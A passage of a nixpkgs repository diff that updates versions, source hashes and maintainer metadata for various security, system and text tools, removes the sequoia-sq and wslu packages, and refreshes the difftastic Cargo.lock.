"sha256-0Si4wUymwA2k/u953GifYgHKi6gvu3FiaDHm1Kj30sA="; }; }; @@ -25,15 +25,15 @@ rec { core = { x86_64-linux = { platform = "any"; - hash = "sha256-GQAKw3Q2RFuCnVFeT5OE2ybBBAMYtLx3GZyqFHDF89A="; + hash = "sha256-KBiYd1zWDxs5T2AGR49o/X2J6espuqi7ykCh3Zsg8i4="; }; x86_64-darwin = { platform = "macosx_10_14_x86_64"; - hash = "sha256-gFes5goprwIrA5PYMwtzgtn2Q+CcFHogvLr9XaAZ2m4="; + hash = "sha256-EfVpKdRE5qvEVMGu8QUM183YPNDjgxQlca3nUb3m1tw="; }; aarch64-darwin = { platform = "macosx_11_0_arm64"; - hash = "sha256-ozDT2RGExMgVs2vaTGI3IrtzGD17W5ZcIGaEgyv+GZw="; + hash = "sha256-ksqkVdE7aIbeETSxLpDXef6Hmv7G5LxQ0+v+/G9OpKk="; }; }; diff --git a/nixpkgs/pkgs/tools/security/sequoia-sq/default.nix b/nixpkgs/pkgs/tools/security/sequoia-sq/default.nix deleted file mode 100644 index 699a8ee63632..000000000000 --- a/nixpkgs/pkgs/tools/security/sequoia-sq/default.nix +++ /dev/null @@ -1,62 +0,0 @@ -{ stdenv -, fetchFromGitLab -, lib -, darwin -, nettle -, nix-update-script -, rustPlatform -, pkg-config -, openssl -, sqlite -}: - -rustPlatform.buildRustPackage rec { - pname = "sequoia-sq"; - version = "0.32.0"; - - src = fetchFromGitLab { - owner = "sequoia-pgp"; - repo = "sequoia-sq"; - rev = "v${version}"; - hash = "sha256-2a6LIW5ohSi7fbMwk/wmNJ0AOz5JIXiXJI7EoVKv1Sk="; - }; - - cargoHash = "sha256-beA0viJVDjfANsPegkc/x2syVp8uGKTMnrPcM7jcvG4="; - - nativeBuildInputs = [ - pkg-config - rustPlatform.bindgenHook - ]; - - buildInputs = [ - openssl - sqlite - nettle - ] ++ lib.optionals stdenv.isDarwin (with darwin.apple_sdk.frameworks; [ Security SystemConfiguration ]); - - # Sometimes, tests fail on CI (ofborg) & hydra without this - checkFlags = [ - # doctest for sequoia-ipc fail for some reason - "--skip=macros::assert_send_and_sync" - "--skip=macros::time_it" - ]; - - # Install manual pages, see https://gitlab.com/sequoia-pgp/sequoia-sq#building - postInstall = '' - mkdir -p $out/share/man - SQ_MAN=$out/share/man/man1 cargo run - ''; - - doCheck = true; - - passthru.updateScript = nix-update-script { }; - - meta = with lib; { - description = "A cool new OpenPGP implementation"; - homepage = "https://sequoia-pgp.org/"; - changelog = "https://gitlab.com/sequoia-pgp/sequoia-sq/-/blob/v${version}/NEWS"; - license = licenses.gpl2Plus; - maintainers = with maintainers; [ minijackson doronbehar ]; - mainProgram = "sq"; - }; -} diff --git a/nixpkgs/pkgs/tools/security/signify/default.nix b/nixpkgs/pkgs/tools/security/signify/default.nix index 645cb010bdf3..ac8b2ace3af1 100644 --- a/nixpkgs/pkgs/tools/security/signify/default.nix +++ b/nixpkgs/pkgs/tools/security/signify/default.nix @@ -2,13 +2,13 @@ stdenv.mkDerivation rec { pname = "signify"; - version = "31"; + version = "32"; src = fetchFromGitHub { owner = "aperezdc"; repo = "signify"; rev = "v${version}"; - sha256 = "sha256-y9jWG1JJhYCn6e5E2qjVqK8nmZpktiB7d9e9uP+3DLo="; + sha256 = "sha256-y2A+Szt451CmaWOc2Y2vBSwSgziJsSnTjNClbdyxG2U="; }; doCheck = true; diff --git a/nixpkgs/pkgs/tools/security/spire/default.nix b/nixpkgs/pkgs/tools/security/spire/default.nix index cade2f1299b5..19e2704516da 100644 --- a/nixpkgs/pkgs/tools/security/spire/default.nix +++ b/nixpkgs/pkgs/tools/security/spire/default.nix @@ -2,7 +2,7 @@ buildGoModule rec { pname = "spire"; - version = "1.9.0"; + version = "1.9.1"; outputs = [ "out" "agent" "server" ]; @@ -10,7 +10,7 @@ buildGoModule rec { owner = "spiffe"; repo = pname; rev = "v${version}"; - sha256 = "sha256-0gV4s5MsA5+QhDpceRH20/KjPJi5YF4HsN3HF1u7vBo="; + sha256 = "sha256-+IIT2y4TJDhxxEFiaefgiHVSzO4sVQ3oPO1aMEoBQTU="; }; vendorHash = "sha256-X8/R2u7mAJuwfltIZV5NrgbzR0U6Ty092Wlbs3u9oIw="; diff --git a/nixpkgs/pkgs/tools/security/ssh-to-age/default.nix b/nixpkgs/pkgs/tools/security/ssh-to-age/default.nix index 90ea4c9b7eb5..5392f0c8a8c4 100644 --- a/nixpkgs/pkgs/tools/security/ssh-to-age/default.nix +++ b/nixpkgs/pkgs/tools/security/ssh-to-age/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "ssh-to-age"; - version = "1.1.6"; + version = "1.1.7"; src = fetchFromGitHub { owner = "Mic92"; repo = "ssh-to-age"; rev = version; - sha256 = "sha256-cYSrosDFdueEJPQdDYCMObMPwQTvuXUBHXPO0rhehxk="; + sha256 = "sha256-NHNjBMK4eJZSZMOg75VmpD6mVQaRJbk5GoJST9W6j4w="; }; - vendorHash = "sha256-dmxFkoz/2qyUv2/I8bLFTYAfUcYdHjVYQgmg8xleIxA="; + vendorHash = "sha256-JpZ+cdDQ3yfH0EAyzi3HO7bozGYJgCYFf2KO/lXwCf8="; checkPhase = '' runHook preCheck diff --git a/nixpkgs/pkgs/tools/security/terrascan/default.nix b/nixpkgs/pkgs/tools/security/terrascan/default.nix index 3331c9c4b33f..864289f92f59 100644 --- a/nixpkgs/pkgs/tools/security/terrascan/default.nix +++ b/nixpkgs/pkgs/tools/security/terrascan/default.nix @@ -5,13 +5,13 @@ buildGoModule rec { pname = "terrascan"; - version = "1.18.12"; + version = "1.19.1"; src = fetchFromGitHub { owner = "accurics"; repo = pname; rev = "refs/tags/v${version}"; - hash = "sha256-NTk/tCIArucJ12RR173bQ/VoP74oROYwmMrQizE+5iU="; + hash = "sha256-K70jGhutHHJrpgKh8RJTzQDjqYk6rBURM4KAaBX9tOE="; }; vendorHash = "sha256-Hk7dkhb1GiCY9CkKZ1dMQc+s97VRUli7WAoneJVNK08="; diff --git a/nixpkgs/pkgs/tools/security/trufflehog/default.nix b/nixpkgs/pkgs/tools/security/trufflehog/default.nix index ed44f89dc40f..5b6868fcc6c8 100644 --- a/nixpkgs/pkgs/tools/security/trufflehog/default.nix +++ b/nixpkgs/pkgs/tools/security/trufflehog/default.nix @@ -7,16 +7,16 @@ buildGoModule rec { pname = "trufflehog"; - version = "3.68.3"; + version = "3.69.0"; src = fetchFromGitHub { owner = "trufflesecurity"; repo = "trufflehog"; rev = "refs/tags/v${version}"; - hash = "sha256-gX0NEXRFN9UFqtdKf/2MuqtFYfWQs0H0Foq+IPiMprU="; + hash = "sha256-1O1iwZQdC4Vf/mGRauZwg6U52bF28IqCUw8Ugt3USFI="; }; - vendorHash = "sha256-2QHIdVi0hDWxACbzIp+OYSxCC/ZyM3CdhP0abVansBI="; + vendorHash = "sha256-c9CkQMTH2mRpKjlyV7lnNyKQYgPxEP9adHcSh9qsWYk="; ldflags = [ "-s" diff --git a/nixpkgs/pkgs/tools/security/vault/default.nix b/nixpkgs/pkgs/tools/security/vault/default.nix index 0db950ddca54..bec13959dc43 100644 --- a/nixpkgs/pkgs/tools/security/vault/default.nix +++ b/nixpkgs/pkgs/tools/security/vault/default.nix @@ -6,16 +6,16 @@ buildGoModule rec { pname = "vault"; - version = "1.15.5"; + version = "1.15.6"; src = fetchFromGitHub { owner = "hashicorp"; repo = "vault"; rev = "v${version}"; - sha256 = "sha256-KDQgiG+HSkLjiJfej9VqTcPZxOMMTh9n9yTDGfiGF3g="; + hash = "sha256-XqPuikUUm8C02Uv6qZHPz/KEmrvBrr8gOznQ7qbMKnU="; }; - vendorHash = "sha256-fNUoeyBVci/S4LCpAPYjVbf8r+ROB5uL1TaUKJZsNes="; + vendorHash = "sha256-SYGqlLCA7T4MhRlOVBSYnZdZ2+WuJvmmHw3MdnfoezM="; proxyVendor = true; diff --git a/nixpkgs/pkgs/tools/security/vault/vault-bin.nix b/nixpkgs/pkgs/tools/security/vault/vault-bin.nix index 88430d842841..8644949bf68b 100644 --- a/nixpkgs/pkgs/tools/security/vault/vault-bin.nix +++ b/nixpkgs/pkgs/tools/security/vault/vault-bin.nix @@ -2,7 +2,7 @@ stdenv.mkDerivation rec { pname = "vault-bin"; - version = "1.15.5"; + version = "1.15.6"; src = let @@ -16,11 +16,11 @@ stdenv.mkDerivation rec { aarch64-darwin = "darwin_arm64"; }; sha256 = selectSystem { - x86_64-linux = "sha256-WchJdMn8PkCu3MydY6ssbXpMCaQBlDbyTQ1kF69KQ+0="; - aarch64-linux = "sha256-tjLyPC156q8y4RKB0+QVIxiXbkW6/qTytCC0WhOo8xU="; - i686-linux = "sha256-TSAhomxTIKSHE0BE1jiL9a15hpGRmF7clFbTwsrDxuk="; - x86_64-darwin = "sha256-vG3S84P7+zvQnIjohPHN3JefN4wM9uDdPqindnwlXpE="; - aarch64-darwin = "sha256-nQsKXD+1gGclUoZLlUpA6k9QuNv/NQ+roRa6kvXCIXQ="; + x86_64-linux = "sha256-qZXR0bqsU0BcM4hWbCZ6vqnjh5pnddl7WTKKBGt1ioU="; + aarch64-linux = "sha256-4f0D+D+rL28mzCN8ku/FWrRFFUevY5yWIgifvZrDbuw="; + i686-linux = "sha256-YoG2NC6cBCunIql7kIRIOs0hU0dIQKIHN/Z27IGj1io="; + x86_64-darwin = "sha256-sdbwnoWZKbq0l86ikfHAR+LYI285IGRiZBB7woD/s/8="; + aarch64-darwin = "sha256-JcTt67eWgORgEmuiBpY5fSGJr8vvCOwKbnOTYZh2fIM="; }; in fetchzip { diff --git a/nixpkgs/pkgs/tools/security/vaultwarden/default.nix b/nixpkgs/pkgs/tools/security/vaultwarden/default.nix index 3261dc5a923c..5fbe5e22d765 100644 --- a/nixpkgs/pkgs/tools/security/vaultwarden/default.nix +++ b/nixpkgs/pkgs/tools/security/vaultwarden/default.nix @@ -39,7 +39,7 @@ rustPlatform.buildRustPackage rec { homepage = "https://github.com/dani-garcia/vaultwarden"; changelog = "https://github.com/dani-garcia/vaultwarden/releases/tag/${version}"; license = licenses.agpl3Only; - maintainers = with maintainers; [ SuperSandro2000 ivan ]; + maintainers = with maintainers; [ dotlambda SuperSandro2000 ]; mainProgram = "vaultwarden"; }; } diff --git a/nixpkgs/pkgs/tools/security/vaultwarden/webvault.nix b/nixpkgs/pkgs/tools/security/vaultwarden/webvault.nix index 2fceb8b05f95..528ba9434c44 100644 --- a/nixpkgs/pkgs/tools/security/vaultwarden/webvault.nix +++ b/nixpkgs/pkgs/tools/security/vaultwarden/webvault.nix @@ -4,6 +4,7 @@ , git , nixosTests , python3 +, vaultwarden }: let @@ -69,6 +70,6 @@ in buildNpmPackage rec { changelog = "https://github.com/dani-garcia/bw_web_builds/releases/tag/v${version}"; platforms = platforms.all; license = licenses.gpl3Plus; - maintainers = with maintainers; [ dotlambda msteen mic92 ]; + inherit (vaultwarden.meta) maintainers; }; } diff --git a/nixpkgs/pkgs/tools/security/witness/default.nix b/nixpkgs/pkgs/tools/security/witness/default.nix index 2b600f4a8617..0b62b31d94e1 100644 --- a/nixpkgs/pkgs/tools/security/witness/default.nix +++ b/nixpkgs/pkgs/tools/security/witness/default.nix @@ -10,15 +10,15 @@ buildGoModule rec { pname = "witness"; - version = "0.3.0"; + version = "0.3.1"; src = fetchFromGitHub { owner = "in-toto"; repo = "witness"; rev = "v${version}"; - sha256 = "sha256-uwps/sHPgOdVhjaFxATVL5A/BGw6zPX/GSkYm802jmU="; + sha256 = "sha256-uv/HxPYOKxZskmlAxUS2I1sW4YsSAmIeNHjoJeR7VWs="; }; - vendorHash = "sha256-ktBpv2NDsha2mN3OtZWIDkneR8zi1RZkVQdvi9XPSLY="; + vendorHash = "sha256-9IkDBaDRJGWfPRN5+rYU4uH6nAsfnytDkF518rfNpyc="; nativeBuildInputs = [ installShellFiles ]; diff --git a/nixpkgs/pkgs/tools/security/yara/default.nix b/nixpkgs/pkgs/tools/security/yara/default.nix index a03763603382..36a77102eb43 100644 --- a/nixpkgs/pkgs/tools/security/yara/default.nix +++ b/nixpkgs/pkgs/tools/security/yara/default.nix @@ -1,6 +1,5 @@ { lib, stdenv , fetchFromGitHub -, fetchpatch , autoreconfHook , pcre , pkg-config @@ -16,23 +15,15 @@ stdenv.mkDerivation rec { pname = "yara"; - version = "4.4.0"; + version = "4.5.0"; src = fetchFromGitHub { owner = "VirusTotal"; repo = pname; rev = "v${version}"; - hash = "sha256-axHFy7YwLhhww+lh+ORyW6YG+T385msysIHK5SMyhMk="; + hash = "sha256-AecHsUBtBleUkWuYMQ4Tx/PY8cs9j7JwqncBziJD0hA="; }; - patches = [ - (fetchpatch { - name = "musl.patch"; - url = "https://github.com/VirusTotal/yara/commit/515ed861cf30e154b14a69ffd46c347fb81df72f.patch"; - hash = "sha256-2scnUyz0SSkNRlsVQapPgI1ATIPXEogqtxbimYYq4Jo="; - }) - ]; - nativeBuildInputs = [ autoreconfHook pkg-config diff --git a/nixpkgs/pkgs/tools/security/yaralyzer/default.nix b/nixpkgs/pkgs/tools/security/yaralyzer/default.nix index 4379bbc5c63c..ddfc828741e5 100644 --- a/nixpkgs/pkgs/tools/security/yaralyzer/default.nix +++ b/nixpkgs/pkgs/tools/security/yaralyzer/default.nix @@ -3,16 +3,31 @@ , fetchFromGitHub }: -python3.pkgs.buildPythonApplication rec { +let + python = python3.override { + packageOverrides = self: super: { + yara-python = super.yara-python.overridePythonAttrs (oldAttrs: rec { + version = "4.2.3"; + src = fetchFromGitHub { + owner = "VirusTotal"; + repo = "yara-python"; + rev = "v${version}"; + hash = "sha256-spUQuezQMqaG1hboM0/Gs7siCM6x0b40O+sV7qGGBng="; + }; + }); + }; + }; +in +python.pkgs.buildPythonApplication rec { pname = "yaralyzer"; - version = "0.9.0"; - format = "pyproject"; + version = "0.9.3"; + pyproject = true; src = fetchFromGitHub { owner = "michelcrypt4d4mus"; repo = "yaralyzer"; rev = "refs/tags/v${version}"; - hash = "sha256-QsMO/fnHy4puuToUHSS05fWnXHdAVnWFFBVq3cb0Zj4="; + hash = "sha256-KGQNonzAZp8c0a3Rjb1WfsEkx5srgRzZfGR3gfNEdzY="; }; pythonRelaxDeps = [ @@ -20,12 +35,12 @@ python3.pkgs.buildPythonApplication rec { "rich" ]; - nativeBuildInputs = with python3.pkgs; [ + nativeBuildInputs = with python.pkgs; [ poetry-core pythonRelaxDepsHook ]; - propagatedBuildInputs = with python3.pkgs; [ + propagatedBuildInputs = with python.pkgs; [ chardet python-dotenv rich @@ -43,5 +58,6 @@ python3.pkgs.buildPythonApplication rec { changelog = "https://github.com/michelcrypt4d4mus/yaralyzer/blob/${version}/CHANGELOG.md"; license = licenses.gpl3Only; maintainers = with maintainers; [ fab ]; + mainProgram = "yaralyze"; }; } diff --git a/nixpkgs/pkgs/tools/system/automatic-timezoned/default.nix b/nixpkgs/pkgs/tools/system/automatic-timezoned/default.nix index d0f928f29291..2bac409565fa 100644 --- a/nixpkgs/pkgs/tools/system/automatic-timezoned/default.nix +++ b/nixpkgs/pkgs/tools/system/automatic-timezoned/default.nix @@ -5,16 +5,16 @@ rustPlatform.buildRustPackage rec { pname = "automatic-timezoned"; - version = "2.0.0"; + version = "2.0.4"; src = fetchFromGitHub { owner = "maxbrunet"; repo = pname; rev = "v${version}"; - sha256 = "sha256-t7AozR3R+msppRnHTPRy3hd2SuCR9NZdg85+FLqSWEc="; + sha256 = "sha256-znoQPpnBU3cLxNmnIKvqj/fIuZDGCdmICx2UL1tqAnc="; }; - cargoHash = "sha256-d+SDI5keZ044LtS/A3K26moFVQngUfNNfr33PipTTg4="; + cargoHash = "sha256-1G81O+WKGVnRLGS6/6iiqsMiY5AaFrzEa9JD1MBDSGY="; meta = with lib; { description = "Automatically update system timezone based on location"; diff --git a/nixpkgs/pkgs/tools/system/bfs/default.nix b/nixpkgs/pkgs/tools/system/bfs/default.nix index db663f46d70e..ea23d7307d72 100644 --- a/nixpkgs/pkgs/tools/system/bfs/default.nix +++ b/nixpkgs/pkgs/tools/system/bfs/default.nix @@ -2,13 +2,13 @@ stdenv.mkDerivation rec { pname = "bfs"; - version = "3.1.1"; + version = "3.1.3"; src = fetchFromGitHub { repo = "bfs"; owner = "tavianator"; rev = version; - hash = "sha256-lsVfsNVjFX38YaYVBJWEst3c3RhUCbK2ycteqZZUM3M="; + hash = "sha256-/thPPueNrYzbxxZYAqlxZ2GEsceCzd+LkI84S8AS1mo="; }; buildInputs = [ oniguruma ] ++ lib.optionals stdenv.isLinux [ libcap acl liburing ]; diff --git a/nixpkgs/pkgs/tools/system/consul-template/default.nix b/nixpkgs/pkgs/tools/system/consul-template/default.nix index ea25b0cb1955..08ad879193f8 100644 --- a/nixpkgs/pkgs/tools/system/consul-template/default.nix +++ b/nixpkgs/pkgs/tools/system/consul-template/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "consul-template"; - version = "0.36.0"; + version = "0.37.1"; src = fetchFromGitHub { owner = "hashicorp"; repo = "consul-template"; rev = "v${version}"; - hash = "sha256-qhncff3DAJ3fiLJRVVcRZpDmzFEQI5J1cFXnlyUJRRs="; + hash = "sha256-s1UhbCxqWm7a5ulPPnbw0lO5lbRShTBBzAGuxWV5msM="; }; - vendorHash = "sha256-nOxdhVEMepZMq51M6MDIyTxBYThrwrT0C0wdwzsjoPI="; + vendorHash = "sha256-eFxXiRO2ruf1YLLWsCAYxTNUnKpaBXO8mLM4REThG1s="; # consul-template tests depend on vault and consul services running to # execute tests so we skip them here diff --git a/nixpkgs/pkgs/tools/system/nsc/default.nix b/nixpkgs/pkgs/tools/system/nsc/default.nix index bec4a3114102..8e902f7c8ab5 100644 --- a/nixpkgs/pkgs/tools/system/nsc/default.nix +++ b/nixpkgs/pkgs/tools/system/nsc/default.nix @@ -7,13 +7,13 @@ buildGoModule rec { pname = "nsc"; - version = "2.8.5"; + version = "2.8.6"; src = fetchFromGitHub { owner = "nats-io"; repo = pname; rev = "v${version}"; - hash = "sha256-9qsHZTbK2RCDiQ5wlo2D79GeI5dbCvL2LofPnF7f8Cc="; + hash = "sha256-t8THHXv1/u5qf0QcLQAu4fMMRiGJ+gG9Huu2NkfMIyQ="; }; ldflags = [ @@ -23,7 +23,7 @@ buildGoModule rec { "-X main.builtBy=nixpkgs" ]; - vendorHash = "sha256-B3uIFJaEsj9tpjPBiU+rXVlfcgVwZUQe3VSSoZQqBG8="; + vendorHash = "sha256-M/wM03SumQUAVmBM+oyQ0KpqyB741Zl5LuSmNnJ9bxg="; nativeBuildInputs = [ installShellFiles ]; @@ -44,7 +44,7 @@ buildGoModule rec { # the test strips table formatting from the command output in a naive way # that removes all the table characters, including '-'. # The nix build directory looks something like: - # /private/tmp/nix-build-nsc-2.8.5.drv-0/nsc_test2000598938/keys + # /private/tmp/nix-build-nsc-2.8.6.drv-0/nsc_test2000598938/keys # Then the `-` are removed from the path unintentionally and the test fails. # This should be fixed upstream to avoid mangling the path when # removing the table decorations from the command output. diff --git a/nixpkgs/pkgs/tools/system/pciutils/default.nix b/nixpkgs/pkgs/tools/system/pciutils/default.nix index 2dd628f99e94..defad03c0b6b 100644 --- a/nixpkgs/pkgs/tools/system/pciutils/default.nix +++ b/nixpkgs/pkgs/tools/system/pciutils/default.nix @@ -7,11 +7,11 @@ stdenv.mkDerivation rec { pname = "pciutils"; - version = "3.10.0"; # with release-date database + version = "3.11.1"; # with release-date database src = fetchurl { url = "mirror://kernel/software/utils/pciutils/pciutils-${version}.tar.xz"; - sha256 = "sha256-I4ouJxZnMOU6F/4Hv60ingf6ObYYEX5ZRLbX7an7sOk="; + hash = "sha256-P0cq2GRHPeW6F/dlzJbvXzPhtzCRjTrdpvlFoqkpDfQ="; }; nativeBuildInputs = [ pkg-config ]; diff --git a/nixpkgs/pkgs/tools/system/rsyslog/default.nix b/nixpkgs/pkgs/tools/system/rsyslog/default.nix index b678f5cda2a9..37af3d87fefc 100644 --- a/nixpkgs/pkgs/tools/system/rsyslog/default.nix +++ b/nixpkgs/pkgs/tools/system/rsyslog/default.nix @@ -61,11 +61,11 @@ stdenv.mkDerivation rec { pname = "rsyslog"; - version = "8.2312.0"; + version = "8.2402.0"; src = fetchurl { url = "https://www.rsyslog.com/files/download/rsyslog/${pname}-${version}.tar.gz"; - hash = "sha256-d0AyAGEoqJZDf1kT4TKqJ9v7k3zYhH5ElSLVoS1j0D4="; + hash = "sha256-rL3YV5SJ3za0o4PcaQmmG3YjgH8K/1TAYhFfLefqhbo="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/system/s-tui/default.nix b/nixpkgs/pkgs/tools/system/s-tui/default.nix index 8f81ba97a0da..02ae09fad96a 100644 --- a/nixpkgs/pkgs/tools/system/s-tui/default.nix +++ b/nixpkgs/pkgs/tools/system/s-tui/default.nix @@ -9,11 +9,11 @@ python3Packages.buildPythonPackage rec { pname = "s-tui"; - version = "1.1.4"; + version = "1.1.6"; src = fetchPypi { inherit pname version; - sha256 = "sha256-soVrmzlVy0zrqvOclR7SfPphp4xAEHv+xdr0NN19ye0="; + sha256 = "sha256-nSdpnM8ubodlPwmvdmNFTn9TsS8i7lWBZ2CifMHDe1c="; }; propagatedBuildInputs = with python3Packages; [ diff --git a/nixpkgs/pkgs/tools/system/stress-ng/default.nix b/nixpkgs/pkgs/tools/system/stress-ng/default.nix index f37d5f628791..598078645bd9 100644 --- a/nixpkgs/pkgs/tools/system/stress-ng/default.nix +++ b/nixpkgs/pkgs/tools/system/stress-ng/default.nix @@ -4,13 +4,13 @@ stdenv.mkDerivation rec { pname = "stress-ng"; - version = "0.17.04"; + version = "0.17.05"; src = fetchFromGitHub { owner = "ColinIanKing"; repo = pname; rev = "V${version}"; - hash = "sha256-oD2NosZ5lswdSL1sh/nOHdRNyzrNJt+t+8r/dx9Z9/k="; + hash = "sha256-TlMLCDwFJGEEttdP9Wc0KAtj9Na1NC5E5e2VsTQugG4="; }; postPatch = '' diff --git a/nixpkgs/pkgs/tools/system/wslu/default.nix b/nixpkgs/pkgs/tools/system/wslu/default.nix deleted file mode 100644 index 6337e479bb31..000000000000 --- a/nixpkgs/pkgs/tools/system/wslu/default.nix +++ /dev/null @@ -1,39 +0,0 @@ -{ lib -, stdenv -, fetchFromGitHub -}: - -stdenv.mkDerivation rec { - pname = "wslu"; - version = "4.1.1"; - - src = fetchFromGitHub { - owner = "wslutilities"; - repo = pname; - rev = "v${version}"; - hash = "sha256-yhugh836BoSISbTu19ubLOrz5X31Opu5QtCR0DXrbWc="; - }; - - patches = [ - ./fallback-conf-nix-store.diff - ]; - - postPatch = '' - substituteInPlace src/wslu-header \ - --subst-var out - ''; - - makeFlags = [ - "DESTDIR=$(out)" - "PREFIX=" - ]; - - meta = with lib; { - description = "A collection of utilities for Windows Subsystem for Linux"; - homepage = "https://github.com/wslutilities/wslu"; - changelog = "https://github.com/wslutilities/wslu/releases/tag/v${version}"; - license = licenses.gpl3Plus; - maintainers = with maintainers; [ jamiemagee ]; - platforms = platforms.linux; - }; -} diff --git a/nixpkgs/pkgs/tools/system/wslu/fallback-conf-nix-store.diff b/nixpkgs/pkgs/tools/system/wslu/fallback-conf-nix-store.diff deleted file mode 100644 index 6315e78d7de4..000000000000 --- a/nixpkgs/pkgs/tools/system/wslu/fallback-conf-nix-store.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/src/wslu-header b/src/wslu-header -index 5f33925..159c6af 100644 ---- a/src/wslu-header -+++ b/src/wslu-header -@@ -169,11 +169,17 @@ if [ -f "$HOME/.config/wslu/conf" ]; then - debug_echo "$HOME/.config/wslu/conf found, sourcing" - source "$HOME/.config/wslu/conf" - fi -+ - if [ -f "$HOME/.wslurc" ]; then - debug_echo "$HOME/.wslurc found, sourcing" - source "$HOME/.wslurc" - fi - -+if [ -f "@out@/share/wslu/conf" ]; then -+ debug_echo "@out@/share/wslu/conf found, sourcing" -+ source "@out@/share/wslu/conf" -+fi -+ - # functions - - function help { diff --git a/nixpkgs/pkgs/tools/text/csview/default.nix b/nixpkgs/pkgs/tools/text/csview/default.nix index 2c450207f50c..8f5ed7989f47 100644 --- a/nixpkgs/pkgs/tools/text/csview/default.nix +++ b/nixpkgs/pkgs/tools/text/csview/default.nix @@ -2,16 +2,16 @@ rustPlatform.buildRustPackage rec { pname = "csview"; - version = "1.2.3"; + version = "1.2.4"; src = fetchFromGitHub { owner = "wfxr"; repo = pname; rev = "v${version}"; - sha256 = "sha256-O6IJGfJwGdtxLyUTFNHp9rGy05gVLlQTS8bTRsSYIuY="; + sha256 = "sha256-7AppXnU9VQx1CMyK2evWtRFVb8qvgSzKp+oFKoIGR9w="; }; - cargoHash = "sha256-jwkoyvelxl2lJoOHznZDmd39GJMye/+vi7PjrzjlLk4="; + cargoHash = "sha256-npbvKwxf6OxNw340yZ9vrQkXrZxD4G8yhZZEdDLwLs8="; meta = with lib; { description = "A high performance csv viewer with cjk/emoji support"; diff --git a/nixpkgs/pkgs/tools/text/difftastic/Cargo.lock b/nixpkgs/pkgs/tools/text/difftastic/Cargo.lock index f0bca647bebb..425b396c8b40 100644 --- a/nixpkgs/pkgs/tools/text/difftastic/Cargo.lock +++ b/nixpkgs/pkgs/tools/text/difftastic/Cargo.lock @@ -4,25 +4,32 @@ version = 3 [[package]] name = "ahash" -version = "0.7.6" +version = "0.8.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fcb51a0695d8f838b1ee009b3fbf66bda078cd64590202a864a8f3e8c4315c47" +checksum = "d713b3834d76b85304d4d525563c1276e2e30dc97cc67bfb4585a4a29fc2c89f" dependencies = [ - "getrandom", + "cfg-if", "once_cell", "version_check", + "zerocopy", ] [[package]] name = "aho-corasick" -version = "1.0.5" +version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0c378d78423fdad8089616f827526ee33c19f2fddbd5de1629152c9593ba4783" +checksum = "b2969dcb958b36655471fc61f7e416fa76033bdd4bfed0678d8fee1e2d07a1f0" dependencies = [ "memchr", ] [[package]] +name = "allocator-api2" +version = "0.2.16" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0942ffc6dcaadf03badf6e6a2d0228460359d5e34b57ccdc720b7382dfbd5ec5" + +[[package]] name = "assert_cmd" version = "2.0.5" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -61,9 +68,9 @@ checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a" [[package]] name = "bitflags" -version = "2.4.1" +version = "2.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "327762f6e5a765692301e5bb513e0d9fef63be86bbc14528052b1cd3e6f03e07" +checksum = "ed570934406eb16438a4e976b1b4500774099c13b8cb96eec99f620f05090ddf" [[package]] name = "bstr" @@ -88,9 +95,9 @@ dependencies = [ [[package]] name = "bumpalo" -version = "3.11.1" +version = "3.14.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "572f695136211188308f16ad2ca5c851a712c464060ae6974944458eb83880ba" +checksum = "7f30e7476521f6f8af1a1c4c0b8cc94f0bee37d91763d0ca2665f299b6cd8aec" [[package]] name = "bytecount" @@ -115,15 +122,15 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "clap" -version = "3.1.18" +version = "3.2.25" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d2dbdf4bdacb33466e854ce889eee8dfd5729abf7ccd7664d0a2d60cd384440b" +checksum = "4ea181bf566f71cb9a5d17a59e1871af638180a18fb0035c92ae62b705207123" dependencies = [ "atty", "bitflags 1.3.2", "clap_lex", "indexmap", - "lazy_static", + "once_cell", "strsim", "termcolor", "terminal_size", @@ -132,9 +139,9 @@ dependencies = [ [[package]] name = "clap_lex" -version = "0.2.0" +version = "0.2.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a37c35f1112dad5e6e0b1adaff798507497a18fceeb30cceb3bae7d1427b9213" +checksum = "2850f2f5a82cbf437dd5af4d49848fbdfc27c157c3d010345776f952765261c5" dependencies = [ "os_str_bytes", ] @@ -210,7 +217,7 @@ version = "0.27.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "f476fe445d41c9e991fd07515a6f463074b782242ccf4a5b7b1d1012e70824df" dependencies = [ - "bitflags 2.4.1", + "bitflags 2.4.2", "crossterm_winapi", "libc", "mio", @@ -253,9 +260,8 @@ checksum = "6184e33543162437515c2e2b48714794e37845ec9851711914eec9d308f6ebe8" [[package]] name = "difftastic" -version = "0.55.0" +version = "0.56.1" dependencies = [ - "aho-corasick", "assert_cmd", "bumpalo", "cc", @@ -263,7 +269,7 @@ dependencies = [ "const_format", "crossterm", "glob", - "hashbrown 0.12.3", + "hashbrown 0.14.3", "humansize", "ignore", "itertools 0.11.0", @@ -272,7 +278,6 @@ dependencies = [ "libmimalloc-sys", "line-numbers", "log", - "memchr", "mimalloc", "owo-colors", "predicates", @@ -326,7 +331,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ac3e13f66a2f95e32a39eaa81f6b95d42878ca0e1db0c7543723dfe12557e860" dependencies = [ "libc", - "windows-sys 0.48.0", + "windows-sys", ] [[package]] @@ -351,17 +356,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3f9eec918d3f24069decb9af1554cad7c880e2da24a9afd88aca000531ab82c1" [[package]] -name = "getrandom" -version = "0.2.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c85e1d9ab2eadba7e5040d4e09cbd6d072b76a557ad64e797c2cb9d4da21d7e4" -dependencies = [ - "cfg-if", - "libc", - "wasi", -] - -[[package]] name = "glob" version = "0.3.1" 